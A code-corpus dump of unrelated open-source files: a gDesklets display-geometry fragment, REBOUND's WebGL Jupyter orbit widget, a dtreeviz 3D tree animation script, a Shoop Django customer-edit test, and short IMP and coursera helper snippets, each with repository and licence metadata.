if (w.as_px() > 0): ux.set_100_percent(w.as_px())
if (h.as_px() > 0): uy.set_100_percent(h.as_px())
event["x"] = ux
event["y"] = uy
# FIXME: remove eventually :)
if (action == self.ACTION_MOTION): event["_args"] = [x, y]
DataTarget.handle_action(self, action, px, py, event)
#
# Geometry properties.
#
def _setp_geometry(self, key, value):
assert (isinstance(value, Unit.Unit))
if (key == "x"):
self.__layout_object.set_geometry(x = value)
self._setp(key, value)
elif (key == "y"):
self.__layout_object.set_geometry(y = value)
self._setp(key, value)
elif (key == "width"):
self.__layout_object.set_geometry(width = value)
self._setp(key, value)
elif (key == "height"):
self.__layout_object.set_geometry(height = value)
self._setp(key, value)
def _setp_relative_to(self, key, value):
name, mode = value
if (mode == "x"): rx, ry = True, False
elif (mode == "y"): rx, ry = False, True
elif (mode == "xy"): rx, ry = True, True
else: rx, ry = False, False
def f():
try:
parent = self._get_parent()
my_id = self._getp("id")
if (not parent or not parent.get_child_by_id(my_id)):
return
obj = self._get_parent().get_child_by_id(name)
# if it is not a child of our parent and not the parent itself, something is wrong
if (not obj and not (parent._getp("id") == name)):
raise UserError(_("Element \"%s\" does not exist") % name,
_("The <tt>relative-to</tt> property "
"requires a reference to an existing "
"display element within the same parent "
"container."))
# FIXME ?! So far 'relative-to' only works for "siblings".
                # Would 'relative-to' a parent make any sense?!
if obj:
relative = obj.get_layout_object()
self.__layout_object.set_relative_to(relative, rx, ry)
except:
import traceback; traceback.print_exc()
pass
# we have to delay because the relative might not be available at that
# time
utils.request_call(f)
self._setp(key, value)
def _setp_anchor(self, key, value):
self.__anchor = value
if (value in (self.ANCHOR_NW, self.ANCHOR_W, self.ANCHOR_SW)):
ax = 0.0
elif (value in (self.ANCHOR_N, self.ANCHOR_CENTER, self.ANCHOR_S)):
ax = 0.5
else:
ax = 1.0
if (value in (self.ANCHOR_NW, self.ANCHOR_N, self.ANCHOR_NE)):
ay = 0.0
elif (value in (self.ANCHOR_W, self.ANCHOR_CENTER, self.ANCHOR_E)):
ay = 0.5
else:
ay = 1.0
self.__layout_object.set_anchor(ax, ay)
self._setp(key, value)
def _getp_geometry(self, key):
x, y, w, h = self.__layout_object.get_real_geometry()
if (key == "x"):
unit = x
elif (key == "y"):
unit = y
elif (key == "width"):
unit = w
elif (key == "height"):
unit = h
return unit
#
# "visible" property.
#
def _setp_visible(self, key, value):
if (value): self.get_widget().show()
else: self.get_widget().hide()
self.__layout_object.set_enabled(value)
self._setp(key, value)
#
# "menu" property.
#
def _setp_menu(self, key, value):
dsp = self._get_display()
utils.request_call(dsp.open_menu, value)
#
# Action handlers.
#
def _setp__action(self, key, value):
DataTarget._setp__action(self, key, value)
if (key == "on-file-drop"):
self.get_widget().drag_dest_set(gtk.DEST_DEFAULT_ALL,
self.__DND_FILE,
gtk.gdk.ACTION_COPY)
self.get_widget().connect("drag_data_received",
self.__on_file_drop)
elif (key == "on-link-drop"):
self.get_widget().drag_dest_set(gtk.DEST_DEFAULT_ALL,
self.__DND_LINK,
gtk.gdk.ACTION_COPY)
self.get_widget().connect("drag_data_received",
self.__on_link_drop)
#
# "cursor" property.
#
def _setp_cursor(self, key, value):
self._setp(key, value)
if (self.__pushed_cursor):
self._get_display().pop_cursor(self.__pushed_cursor)
self._get_display().pop_cursor(value)
self.__pushed_cursor = value
#
# Unlocks the initial lock for geometry computations.
# By locking the geometry engine initially, we can build up the display
# without redundant geometry computations. The necessary computations are
# done once when unlocking.
#
def unlock_geometry(self):
self._geometry_lock = False
#
# Returns whether the geometry engine is locked.
#
def _is_geometry_locked(self):
return self._geometry_lock
|
RaumZeit/gdesklets-core
|
display/DisplayTarget.py
|
Python
|
gpl-2.0
| 15,981
|
shader_code = """
<script id="orbit_shader-vs" type="x-shader/x-vertex">
uniform vec3 focus;
uniform vec3 aef;
uniform vec3 omegaOmegainc;
attribute float lintwopi;
varying float lin;
uniform mat4 mvp;
const float M_PI = 3.14159265359;
void main() {
float a = aef.x;
float e = aef.y;
float f = aef.z+lintwopi;
lin = lintwopi/(M_PI*2.);
if (e>1.){
float theta_max = acos(-1./e);
f = 0.0001-theta_max+1.9998*lin*theta_max;
lin = sqrt(min(0.5,lin));
}
float omega = omegaOmegainc.x;
float Omega = omegaOmegainc.y;
float inc = omegaOmegainc.z;
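    // Standard conversion from orbital elements to Cartesian coordinates:
    // r is the conic-section radius a(1-e^2)/(1+e*cos(f)), and pos rotates the
    // in-plane point by the argument of pericenter (omega), the inclination
    // (inc) and the longitude of the ascending node (Omega) around the focus.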
float r = a*(1.-e*e)/(1. + e*cos(f));
float cO = cos(Omega);
float sO = sin(Omega);
float co = cos(omega);
float so = sin(omega);
float cf = cos(f);
float sf = sin(f);
float ci = cos(inc);
float si = sin(inc);
vec3 pos = vec3(r*(cO*(co*cf-so*sf) - sO*(so*cf+co*sf)*ci),r*(sO*(co*cf-so*sf) + cO*(so*cf+co*sf)*ci),+ r*(so*cf+co*sf)*si);
gl_Position = mvp*(vec4(focus+pos, 1.0));
}
</script>
<script id="orbit_shader-fs" type="x-shader/x-fragment">
precision mediump float;
varying float lin;
void main() {
float fog = max(max(0.,-1.+2.*gl_FragCoord.z),max(0.,1.-2.*gl_FragCoord.z));
gl_FragColor = vec4(1.,1.,1.,sqrt(lin)*(1.-fog));
}
</script>
<script id="point_shader-vs" type="x-shader/x-vertex">
attribute vec3 vp;
uniform mat4 mvp;
//uniform vec4 vc;
//varying vec4 color;
void main() {
gl_PointSize = 15.0;
gl_Position = mvp*vec4(vp, 1.0);
//color = vc;
}
</script>
<script id="point_shader-fs" type="x-shader/x-fragment">
precision mediump float;
//varying vec4 color;
void main() {
vec2 rel = gl_PointCoord.st;
rel.s -=0.5;
rel.t -=0.5;
if (length(rel)>0.25){
gl_FragColor = vec4(0.,0.,0.,0.);
}else{
vec4 cmod = vec4(1.,1.,1.,1.);
float fog = max(max(0.,-1.+2.*gl_FragCoord.z),max(0.,1.-2.*gl_FragCoord.z));
cmod.a*= (1.-fog)*min(1.,1.-4.*(length(rel)/0.25-0.75));
gl_FragColor = cmod;
}
}
</script>
"""
js_code = """
<script>
function compileShader(glr, shaderSource, shaderType) {
// Create the shader object
var shader = glr.createShader(shaderType);
// Set the shader source code.
glr.shaderSource(shader, shaderSource);
// Compile the shader
glr.compileShader(shader);
// Check if it compiled
var success = glr.getShaderParameter(shader, glr.COMPILE_STATUS);
if (!success) {
// Something went wrong during compilation; get the error
throw "could not compile shader:" + glr.getShaderInfoLog(shader);
}
return shader;
}
function createShaderFromScript(glr, scriptId, opt_shaderType) {
// look up the script tag by id.
var shaderScript = document.getElementById(scriptId);
if (!shaderScript) {
throw("*** Error: unknown script element" + scriptId);
}
// extract the contents of the script tag.
var shaderSource = shaderScript.text;
// If we didn't pass in a type, use the 'type' from
// the script tag.
if (!opt_shaderType) {
if (shaderScript.type == "x-shader/x-vertex") {
opt_shaderType = glr.VERTEX_SHADER;
} else if (shaderScript.type == "x-shader/x-fragment") {
opt_shaderType = glr.FRAGMENT_SHADER;
} else if (!opt_shaderType) {
throw("*** Error: shader type not set");
}
}
return compileShader(glr, shaderSource, opt_shaderType);
};
function createProgramFromScripts( glr, vertexShaderId, fragmentShaderId) {
var vertexShader = createShaderFromScript(glr, vertexShaderId, glr.VERTEX_SHADER);
var fragmentShader = createShaderFromScript(glr, fragmentShaderId, glr.FRAGMENT_SHADER);
var program = glr.createProgram();
// attach the shaders.
glr.attachShader(program, vertexShader);
glr.attachShader(program, fragmentShader);
// link the program.
glr.linkProgram(program);
// Check if it linked.
var success = glr.getProgramParameter(program, glr.LINK_STATUS);
if (!success) {
// something went wrong with the link
throw ("program filed to link:" + glr.getProgramInfoLog (program));
}
return program;
}
function quat2mat(A,mat){
var xx = A.x*A.x; var xy = A.x*A.y; var xz = A.x*A.z;
var xw = A.x*A.w; var yy = A.y*A.y; var yz = A.y*A.z;
var yw = A.y*A.w; var zz = A.z*A.z; var zw = A.z*A.w;
mat[0] = 1.-2.*(yy+zz);
mat[1] = 2.*(xy-zw);
mat[2] = 2.*(xz+yw);
mat[4] = 2.*(xy+zw);
mat[5] = 1.-2.*(xx+zz);
mat[6] = 2.*(yz-xw);
mat[8] = 2.*(xz-yw);
mat[9] = 2.*(yz+xw);
mat[10]= 1.-2.*(xx+yy);
mat[3] = mat[7] = mat[11] = mat[12] = mat[13] = mat[14] = 0.; mat[15]= 1.;
}
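// quat2mat above writes the standard rotation matrix of the unit quaternion A
// into a flat 4x4 array in row-major order; mattransp() is applied before
// uploading matrices because uniformMatrix4fv expects column-major data.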
function multvec(A, B, vecr){
var mat = [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.];
quat2mat(A,mat);
vecr[0] = mat[0]*B[0] + mat[1]*B[1] + mat[2]*B[2];
vecr[1] = mat[4]*B[0] + mat[5]*B[1] + mat[6]*B[2];
vecr[2] = mat[8]*B[0] + mat[9]*B[1] + mat[10]*B[2];
}
function mattransp(mat){
var matt = [
mat[0], mat[4], mat[8], mat[12],
mat[1], mat[5], mat[9], mat[13],
mat[2], mat[6], mat[10], mat[14],
mat[3], mat[7], mat[11], mat[15]];
return matt;
}
function conjugate(quat){
var cquat = {x:-quat.x, y:-quat.y, z:-quat.z, w:quat.w};
return cquat;
}
function mult(A, B){
var mquat = { x: A.w*B.x + A.x*B.w + A.y*B.z - A.z*B.y,
y: A.w*B.y - A.x*B.z + A.y*B.w + A.z*B.x,
z: A.w*B.z + A.x*B.y - A.y*B.x + A.z*B.w,
w: A.w*B.w - A.x*B.x - A.y*B.y - A.z*B.z};
return mquat;
}
function normalize(quat){
var L = Math.sqrt(quat.x*quat.x + quat.y*quat.y + quat.z*quat.z + quat.w*quat.w);
var nquat = {x:quat.x/L, y:quat.y/L, z:quat.z/L, w:quat.w/L};
return nquat;
}
function matortho(mat, l, r, b, t, n, f){
mat[0] = 2./(r-l); mat[1] = 0.; mat[2] = 0.; mat[3] = -(r+l)/(r-l);
mat[4] = 0.; mat[5] = 2./(t-b); mat[6] = 0.; mat[7] = -(t+b)/(t-b);
mat[8] = 0.; mat[9] = 0.; mat[10] = -2./(f-n); mat[11] = -(f+n)/(f-n);
mat[12] = 0.; mat[13] = 0.; mat[14] = 0.; mat[15] = 1.;
}
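// matortho fills mat with a standard orthographic projection (the same entries
// as the classic glOrtho matrix), again stored row-major.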
function matmult(A,B,C){
for(i=0;i<4;i++){
for(j=0;j<4;j++){
C[i+4*j] = 0.;
for(k=0;k<4;k++){
C[i+4*j] += A[k+4*j]*B[i+4*k];
}}}
}
function startGL(reboundView) {
var canvas = document.getElementById("reboundcanvas-"+reboundView.cid);
if (!canvas){
reboundView.startCount = reboundView.startCount+1;
if (reboundView.startCount>1000){
console.log("Cannot find element.");
}else{
setTimeout(function(){ startGL(reboundView); }, 10);
}
return;
}
var rect = canvas.getBoundingClientRect()
reboundView.ratio = rect.width/rect.height;
reboundView.view = normalize({x:reboundView.orientation[0], y:reboundView.orientation[1], z:reboundView.orientation[2], w:reboundView.orientation[3]});
canvas.addEventListener('mousedown', function() {
reboundView.mouseDown=1;
}, false);
canvas.addEventListener('mouseup', function() {
reboundView.mouseDown=0;
}, false);
canvas.addEventListener('mouseleave', function() {
reboundView.mouseDown=0;
}, false);
canvas.addEventListener('mousemove', function(evt) {
var rect = canvas.getBoundingClientRect()
if (reboundView.mouseDown==1){
reboundView.mouseDown = 2;
reboundView.mouse_x = evt.clientX-rect.left;
reboundView.mouse_y = evt.clientY-rect.top;
return;
}else if (reboundView.mouseDown==2){
var width = rect.width;
var height = rect.height;
var dx = 3.*(evt.clientX-rect.left-reboundView.mouse_x)/width;
var dy = 3.*(evt.clientY-rect.top-reboundView.mouse_y)/height;
reboundView.mouse_x = evt.clientX-rect.left;
reboundView.mouse_y = evt.clientY-rect.top;
if (evt.shiftKey){
reboundView.scale *= (1.+dx+dy);
}else{
var inv = conjugate(reboundView.view);
var up = [0.,1.,0.];
var right = [1.,0.,0.];
var inv_up = [0.,0.,0.];
var inv_right = [0.,0.,0.];
multvec(inv, right, inv_right);
multvec(inv, up, inv_up);
var sin_dy = Math.sin(dy);
var rot_dy = {x:inv_right[0]*sin_dy, y:inv_right[1]*sin_dy, z:inv_right[2]*sin_dy, w:Math.cos(dy)};
reboundView.view = mult(reboundView.view, normalize(rot_dy));
var sin_dx = Math.sin(dx);
var rot_dx = {x:inv_up[0]*sin_dx, y:inv_up[1]*sin_dx, z:inv_up[2]*sin_dx, w:Math.cos(dx)};
reboundView.view = normalize(mult(reboundView.view, normalize(rot_dx)));
}
drawGL(reboundView);
}
}, false);
reboundView.gl = canvas.getContext("webgl")||canvas.getContext("experimental-webgl");
if (!reboundView.gl) {
alert("Unable to initialize WebGL. Your browser may not support it.");
return;
}
var gl = reboundView.gl
gl.enable(gl.BLEND);
gl.blendFunc(gl.SRC_ALPHA, gl.ONE_MINUS_SRC_ALPHA);
reboundView.orbit_shader_program = createProgramFromScripts(gl,"orbit_shader-vs","orbit_shader-fs");
reboundView.point_shader_program = createProgramFromScripts(gl,"point_shader-vs","point_shader-fs");
var lintwopi = new Float32Array(500);
for(i=0;i<500;i++){
lintwopi[i] = 2.*Math.PI/500.*i;
}
reboundView.orbit_lintwopi_buffer = gl.createBuffer();
gl.bindBuffer(gl.ARRAY_BUFFER, reboundView.orbit_lintwopi_buffer);
gl.bufferData(gl.ARRAY_BUFFER, 4*500, gl.STATIC_DRAW);
gl.bufferSubData(gl.ARRAY_BUFFER, 0, lintwopi)
reboundView.orbit_shader_mvp_location = gl.getUniformLocation(reboundView.orbit_shader_program,"mvp");
reboundView.orbit_shader_focus_location = gl.getUniformLocation(reboundView.orbit_shader_program,"focus");
reboundView.orbit_shader_aef_location = gl.getUniformLocation(reboundView.orbit_shader_program,"aef");
reboundView.orbit_shader_omegaOmegainc_location = gl.getUniformLocation(reboundView.orbit_shader_program,"omegaOmegainc");
reboundView.particle_data_buffer = gl.createBuffer();
gl.useProgram(reboundView.point_shader_program);
reboundView.point_shader_mvp_location = gl.getUniformLocation(reboundView.point_shader_program,"mvp");
updateRenderData(reboundView);
gl.clearColor(0.0, 0.0, 0.0, 1.0);
gl.clear(gl.COLOR_BUFFER_BIT);
drawGL(reboundView);
}
function updateRenderData(reboundView){
var overlay = document.getElementById("reboundoverlay-"+reboundView.cid);
overlay.innerHTML = reboundView.model.get("overlay");
var previousN = reboundView.N;
reboundView.N = reboundView.model.get("N");
reboundView.t = reboundView.model.get("t");
reboundView.particle_data = reboundView.model.get('particle_data');
if (reboundView.orbits){
reboundView.orbit_data = reboundView.model.get('orbit_data');
}
var gl = reboundView.gl
if (reboundView.N>0){
gl.bindBuffer(gl.ARRAY_BUFFER, reboundView.particle_data_buffer);
gl.bufferData(gl.ARRAY_BUFFER, reboundView.N*7*4, gl.DYNAMIC_DRAW);
gl.bufferSubData(gl.ARRAY_BUFFER, 0, reboundView.particle_data)
}
}
function drawGL(reboundView) {
if (!reboundView.gl){
return;
}
// Cleanup
var gl = reboundView.gl
gl.clearColor(0.0, 0.0, 0.0, 1.0);
gl.clear(gl.COLOR_BUFFER_BIT);
// Draw
gl.useProgram(reboundView.point_shader_program);
gl.bindBuffer(gl.ARRAY_BUFFER, reboundView.particle_data_buffer);
var pvp = gl.getAttribLocation(reboundView.point_shader_program,"vp");
gl.enableVertexAttribArray(pvp);
gl.vertexAttribPointer(pvp, 3, gl.FLOAT, 0, 4*7,0); // 4 = size of float
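    // The stride of 4*7 bytes matches the particle buffer layout set up in
    // updateRenderData (7 floats per particle); only the first 3 floats are
    // read here as the position attribute.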
var projection = [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.];
if (reboundView.ratio>=1.){
matortho(projection,
-1.6*reboundView.scale, 1.6*reboundView.scale,
-1.6/reboundView.ratio*reboundView.scale, 1.6/reboundView.ratio*reboundView.scale,
-2.5*reboundView.scale, 2.5*reboundView.scale);
}else{
matortho(projection,
-1.6*reboundView.ratio*reboundView.scale, 1.6*reboundView.ratio*reboundView.scale,
-1.6*reboundView.scale, 1.6*reboundView.scale,
-2.5*reboundView.scale, 2.5*reboundView.scale);
}
var view = [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.];
quat2mat(reboundView.view,view);
var mvp = [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.];
matmult(projection,view,mvp);
gl.uniformMatrix4fv(reboundView.point_shader_mvp_location,false,mattransp(mvp));
gl.drawArrays(gl.POINTS,0,reboundView.N);
if (reboundView.orbits){
gl.useProgram(reboundView.orbit_shader_program);
gl.bindBuffer(gl.ARRAY_BUFFER, reboundView.orbit_lintwopi_buffer);
var ltp = gl.getAttribLocation(reboundView.orbit_shader_program,"lintwopi");
gl.enableVertexAttribArray(ltp);
gl.vertexAttribPointer(ltp, 1, gl.FLOAT, 0, 0,0); // 4 = size of float
gl.uniformMatrix4fv(reboundView.orbit_shader_mvp_location,false,mattransp(mvp));
        // Need to do this one by one
        // because WebGL does not support
        // instancing:
for(i=0;i<reboundView.N-1;i++){
var focus = new Float32Array(reboundView.orbit_data.buffer,4*9*i,3);
gl.uniform3fv(reboundView.orbit_shader_focus_location,focus);
var aef = new Float32Array(reboundView.orbit_data.buffer,4*(9*i+3),3);
gl.uniform3fv(reboundView.orbit_shader_aef_location,aef);
var omegaOmegainc = new Float32Array(reboundView.orbit_data.buffer,4*(9*i+6),3);
gl.uniform3fv(reboundView.orbit_shader_omegaOmegainc_location,omegaOmegainc);
gl.drawArrays(gl.LINE_STRIP,0,500);
}
}
}
require.undef('rebound');
define('rebound', ["@jupyter-widgets/base"], function(widgets) {
var ReboundView = widgets.DOMWidgetView.extend({
render: function() {
this.el.innerHTML = '<span style="display: inline-block; position: relative;" width="'+this.model.get("width")+'" height="'+this.model.get("height")+'"><canvas style="border: none;" id="reboundcanvas-'+this.cid+'" width="'+this.model.get("width")+'" height="'+this.model.get("height")+'"></canvas><span style="position: absolute; color: #FFF; pointer-events:none; bottom:5px; right:0px; padding-right:5px; font-family: monospace;" id="reboundoverlay-'+this.cid+'">REBOUND</span></span>';
this.model.on('change:t', this.trigger_refresh, this);
this.model.on('change:count', this.trigger_refresh, this);
this.model.on('change:screenshotcount', this.take_screenshot, this);
this.startCount = 0;
this.gl = null;
// Only copy those once
this.scale = this.model.get("scale");
this.width = this.model.get("width");
this.height = this.model.get("height");
this.orbits = this.model.get("orbits");
this.orientation = this.model.get("orientation");
startGL(this);
},
take_screenshot: function() {
drawGL(this);
var canvas = document.getElementById("reboundcanvas-"+this.cid);
var img = canvas.toDataURL("image/png");
this.model.set("screenshot",img, {updated_view: this});
this.touch();
},
trigger_refresh: function() {
updateRenderData(this);
drawGL(this);
},
});
return {
ReboundView: ReboundView
};
});
</script>
"""
import ipywidgets
ipywidgets_major_version = int((ipywidgets.__version__).split(".")[0])
if ipywidgets_major_version<7:
js_code = js_code.replace("@jupyter-widgets/base", "jupyter-js-widgets")
js_code = js_code.replace(".cid", ".id")
from ipywidgets import DOMWidget
import traitlets
import math
import base64
import sys
from ctypes import c_float, byref, create_string_buffer, c_int, c_char, pointer
from . import clibrebound
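# Observer callback for the "screenshot" trait: the JavaScript side (see
# take_screenshot in js_code above) renders the canvas to a base64 PNG and
# writes it into the trait; this callback decodes and saves the image, then
# advances the simulation (or loads the next SimulationArchive snapshot) and
# bumps screenshotcount, which triggers the next screenshot on the client.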
def savescreenshot(change):
if len(change["new"]) and change["type"] =="change":
w = change["owner"]
bd = base64.b64decode(change["new"].split(",")[-1])
if sys.version_info[0] < 3:
with open(w.screenshotprefix+"%05d.png"%w.screenshotcountall, 'w') as f:
f.write(bd)
else:
with open(w.screenshotprefix+"%05d.png"%w.screenshotcountall, 'bw') as f:
f.write(bd)
w.screenshotcountall += 1
if len(w.times)>w.screenshotcount:
nexttime = w.times[w.screenshotcount]
if w.archive:
sim = w.archive.getSimulation(w.times[w.screenshotcount],mode=w.mode)
w.refresh(pointer(sim))
else:
w.simp.contents.integrate(w.times[w.screenshotcount])
w.screenshotcount += 1
else:
w.unobserve(savescreenshot)
w.times = None
w.screenshotprefix = None
class Widget(DOMWidget):
_view_name = traitlets.Unicode('ReboundView').tag(sync=True)
_view_module = traitlets.Unicode('rebound').tag(sync=True)
count = traitlets.Int(0).tag(sync=True)
screenshotcount = traitlets.Int(0).tag(sync=True)
t = traitlets.Float().tag(sync=True)
N = traitlets.Int().tag(sync=True)
    overlay = traitlets.Unicode('REBOUND').tag(sync=True)
width = traitlets.Float().tag(sync=True)
height = traitlets.Float().tag(sync=True)
scale = traitlets.Float().tag(sync=True)
particle_data = traitlets.CBytes(allow_none=True).tag(sync=True)
orbit_data = traitlets.CBytes(allow_none=True).tag(sync=True)
orientation = traitlets.Tuple().tag(sync=True)
orbits = traitlets.Int().tag(sync=True)
screenshot = traitlets.Unicode().tag(sync=True)
def __init__(self,simulation,size=(200,200),orientation=(0.,0.,0.,1.),scale=None,autorefresh=True,orbits=True, overlay=True):
"""
Initializes a Widget.
Widgets provide real-time 3D interactive visualizations for REBOUND simulations
within Jupyter Notebooks. To use widgets, the ipywidgets package needs to be installed
and enabled in your Jupyter notebook server.
Parameters
----------
size : (int, int), optional
            Specify the size of the widget in pixels. The default is 200 by 200 pixels.
orientation : (float, float, float, float), optional
Specify the initial orientation of the view. The four floats correspond to the
x, y, z, and w components of a quaternion. The quaternion will be normalized.
scale : float, optional
Set the initial scale of the view. If not set, the widget will determine the
scale automatically based on current particle positions.
autorefresh : bool, optional
            The default value is True. The view is updated whenever a particle is added
            or removed, and every 100th of a second while a simulation is running. If set
to False, then the user needs to manually call the refresh() function on the
widget. This might be useful if performance is an issue.
orbits : bool, optional
The default value for this is True and the widget will draw the instantaneous
orbits of the particles. For simulations in which particles are not on
Keplerian orbits, the orbits shown will not be accurate.
overlay : string, optional
Change the default text overlay. Set to None to hide all text.
"""
self.screenshotcountall = 0
self.width, self.height = size
self.t, self.N = simulation.t, simulation.N
self.orientation = orientation
self.autorefresh = autorefresh
self.orbits = orbits
self.useroverlay = overlay
self.simp = pointer(simulation)
clibrebound.reb_display_copy_data.restype = c_int
if scale is None:
self.scale = simulation.display_data.contents.scale
else:
self.scale = scale
self.count += 1
super(Widget, self).__init__()
def refresh(self, simp=None, isauto=0):
"""
Manually refreshes a widget.
Note that this function can also be called using the wrapper function of
the Simulation object: sim.refreshWidgets().
"""
if simp==None:
simp = self.simp
if self.autorefresh==0 and isauto==1:
return
sim = simp.contents
size_changed = clibrebound.reb_display_copy_data(simp)
clibrebound.reb_display_prepare_data(simp,c_int(self.orbits))
if sim.N>0:
self.particle_data = (c_char * (4*7*sim.N)).from_address(sim.display_data.contents.particle_data).raw
if self.orbits:
self.orbit_data = (c_char * (4*9*(sim.N-1))).from_address(sim.display_data.contents.orbit_data).raw
if size_changed:
#TODO: Implement better GPU size change
pass
if self.useroverlay==True:
self.overlay = "REBOUND (%s), N=%d, t=%g"%(sim.integrator,sim.N,sim.t)
elif self.useroverlay==None or self.useroverlay==False:
self.overlay = ""
else:
self.overlay = self.useroverlay + ", N=%d, t=%g"%(sim.N,sim.t)
self.N = sim.N
self.t = sim.t
self.count += 1
def takeScreenshot(self, times=None, prefix="./screenshot", resetCounter=False, archive=None,mode="snapshot"):
"""
Take one or more screenshots of the widget and save the images to a file.
The images can be used to create a video.
This function cannot be called multiple times within one cell.
Note: this is a new feature and might not work on all systems.
It was tested on python 2.7.10 and 3.5.2 on MacOSX.
Parameters
----------
times : (float, list), optional
If this argument is not given a screenshot of the widget will be made
as it is (without integrating the simulation). If a float is given, then the
simulation will be integrated to that time and then a screenshot will
be taken. If a list of floats is given, the simulation will be integrated
to each time specified in the array. A separate screenshot for
each time will be saved.
prefix : (str), optional
This string will be part of the output filename for each image.
            It is followed by a five digit integer and the suffix .png. By default the
            prefix is './screenshot' which outputs images in the current
            directory with the filenames screenshot00000.png, screenshot00001.png...
Note that the prefix can include a directory.
resetCounter : (bool), optional
Resets the output counter to 0.
archive : (rebound.SimulationArchive), optional
            Use a REBOUND SimulationArchive. Thus, instead of integrating the
Simulation from the current time, it will use the SimulationArchive
to load a snapshot. See examples for usage.
mode : (string), optional
Mode to use when querying the SimulationArchive. See SimulationArchive
documentation for details. By default the value is "snapshot".
Examples
--------
First, create a simulation and widget. All of the following can go in
one cell.
>>> sim = rebound.Simulation()
>>> sim.add(m=1.)
>>> sim.add(m=1.e-3,x=1.,vy=1.)
>>> w = sim.getWidget()
>>> w
The widget should show up. To take a screenshot, simply call
>>> w.takeScreenshot()
A new file with the name screenshot00000.png will appear in the
current directory.
Note that the takeScreenshot command needs to be in a separate cell,
i.e. after you see the widget.
You can pass an array of times to the function. This allows you to
take multiple screenshots, for example to create a movie,
>>> times = [0,10,100]
>>> w.takeScreenshot(times)
"""
self.archive = archive
if resetCounter:
self.screenshotcountall = 0
self.screenshotprefix = prefix
self.screenshotcount = 0
self.overlay = "REBOUND"
self.screenshot = ""
if archive is None:
if times is None:
times = self.simp.contents.t
try:
# List
len(times)
except:
# Float:
times = [times]
self.times = times
self.observe(savescreenshot,names="screenshot")
self.simp.contents.integrate(times[0])
self.screenshotcount += 1 # triggers first screenshot
else:
if times is None:
raise ValueError("Need times argument for archive mode.")
try:
len(times)
except:
raise ValueError("Need a list of times for archive mode.")
self.times = times
self.mode = mode
self.observe(savescreenshot,names="screenshot")
sim = archive.getSimulation(times[0],mode=mode)
self.refresh(pointer(sim))
self.screenshotcount += 1 # triggers first screenshot
@staticmethod
def getClientCode():
return shader_code + js_code
|
dtamayo/rebound
|
rebound/widget.py
|
Python
|
gpl-3.0
| 25,951
|
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
from PIL import Image as PIL_Image
import glob
import cairosvg # must pip install
from dtreeviz.trees import *
df_cars = pd.read_csv("data/cars.csv")
X = df_cars.drop('MPG', axis=1)
y = df_cars['MPG']
features = [2, 1]
X = X.values[:,features]
max_depth = 4
figsize = (6,5)
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111, projection='3d')
# start topdown view
t = rtreeviz_bivar_3D(ax,
X, y,
max_depth=max_depth,
feature_names=['Vehicle Weight', 'Horse Power'],
target_name='MPG',
fontsize=14,
elev=90,
azim=0,
dist=7,
show={'splits'})
#plt.show()
n = 50
elev_range = np.arange(90, 10, -(90-10)/n)
azim_range = np.arange(0, 25, (22-0)/n)
i = 0
# pause on heatmap topview
for j in range(10):
ax.elev = 90
ax.azim = 0
plt.savefig(f"/tmp/cars-frame-{i:02d}.png", bbox_inches=0, pad_inches=0, dpi=300)
i += 1
# fly through
for elev, azim in zip(elev_range, azim_range):
ax.elev = elev
ax.azim = azim
plt.savefig(f"/tmp/cars-frame-{i:02d}.png", bbox_inches=0, pad_inches=0, dpi=300)
i += 1
# fly back
for elev, azim in reversed(list(zip(elev_range, azim_range))):
ax.elev = elev
ax.azim = azim
plt.savefig(f"/tmp/cars-frame-{i:02d}.png", bbox_inches=0, pad_inches=0, dpi=300)
i += 1
n_images = i
plt.close()
images = [PIL_Image.open(image) for image in [f'/tmp/cars-frame-{i:02d}.png' for i in range(n_images)]]
images[0].save('/tmp/cars-animation.gif',
save_all=True,
append_images=images[1:],
duration=100,
loop=0)
|
parrt/AniML
|
testing/animate_rtree_bivar_3D.py
|
Python
|
bsd-3-clause
| 1,917
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2016, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
import pytest
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.urlresolvers import reverse
from django.shortcuts import resolve_url
from shoop.testing.factories import get_default_shop
from shoop.testing.soup_utils import extract_form_fields
from shoop_tests.utils import SmartClient
@pytest.mark.django_db
def test_new_user_information_edit():
client = SmartClient()
get_default_shop()
# create new user
user_password = "niilo"
user = get_user_model().objects.create_user(
username="Niilo_Nyyppa",
email="niilo@example.shoop.io",
password=user_password,
first_name="Niilo",
last_name="Nyyppä",
)
client.login(username=user.username, password=user_password)
# make sure all information matches in form
customer_edit_url = reverse("shoop:customer_edit")
soup = client.soup(customer_edit_url)
assert soup.find(attrs={"name": "contact-email"})["value"] == user.email
assert soup.find(attrs={"name": "contact-name"})["value"] == user.get_full_name()
# Test POSTing
form = extract_form_fields(soup)
new_email = "nyyppa@example.shoop.io"
form["contact-email"] = new_email
form["contact-country"] = "FI"
for prefix in ("billing", "shipping"):
form["%s-city" % prefix] = "test-city"
form["%s-email" % prefix] = new_email
form["%s-street" % prefix] = "test-street"
form["%s-country" % prefix] = "FI"
response, soup = client.response_and_soup(customer_edit_url, form, "post")
assert response.status_code == 302
assert get_user_model().objects.get(pk=user.pk).email == new_email
@pytest.mark.django_db
def test_customer_edit_redirects_to_login_if_not_logged_in():
    get_default_shop() # Front middleware needs a Shop to exist
response = SmartClient().get(reverse("shoop:customer_edit"), follow=False)
assert response.status_code == 302 # Redirection ("Found")
assert resolve_url(settings.LOGIN_URL) in response.url
|
akx/shoop
|
shoop_tests/front/test_customer_information.py
|
Python
|
agpl-3.0
| 2,322
|
required_modules = 'core:em:algebra:atom:statistics:multifit'
required_dependencies = 'Boost.ProgramOptions:Boost.FileSystem:libTau'
optional_dependencies = ''
|
shanot/imp
|
modules/cnmultifit/dependencies.py
|
Python
|
gpl-3.0
| 160
|
"""
Helper functions that are only used in tests.
"""
import os
import re
from io import open
from six import iteritems
from coursera.define import IN_MEMORY_MARKER
from coursera.utils import BeautifulSoup
